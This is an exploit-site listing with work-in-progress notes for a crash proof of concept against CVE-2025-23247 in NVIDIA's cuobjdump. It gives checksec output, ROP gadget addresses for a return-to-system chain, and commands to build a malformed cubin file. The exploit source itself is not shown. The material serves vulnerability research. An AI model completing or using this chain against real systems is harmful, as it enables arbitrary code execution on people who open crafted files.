Share
## https://sploitus.com/exploit?id=5EE99A70-B3F0-564F-B4DB-51BABECCCB1D
# CVE-2025-23247
Epic Collab with @reubensammut :) as alaways :)
wip for CVE-2025-23247 . ATM just crash PoC which shows we control buffer and offset, so we got aaw. 
Bug from https://talosintelligence.com/vulnerability_reports/TALOS-2025-2151

checksec ./cuobjdump
[*] '/home/vlad/cuobjdump'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)

Anyways we get no PIE so

uint64_t system_plt = 0x401d90;
uint64_t pop_rdi_ret = 0x402d1b;
uint64_t ret_gadget = 0x402d1c;  // Just a ret

Crashpoint
![Screenshot_from_2025-11-20_16-00-41 png-2](https://github.com/user-attachments/assets/0e319b6d-2444-4e22-9479-35e976692a38)

gcc -o modify_simple modify_simple.c
vlad@Vlad-PC:~$ ./modify_simple simple.cubin modified_simple2.cubin
Created modified_simple2.cubin with vulnerable .nv_debug_source section
Run: ./cuobjdump --dump-elf modified_simple2.cubin

And for the cuda kernel

nvcc -ptx simple.cu -o simple.ptx
nvcc -cubin simple.ptx -o simple.cubin --generate-line-info
or
nvcc -cubin simple.cu -o simple.cubin --generate-line-info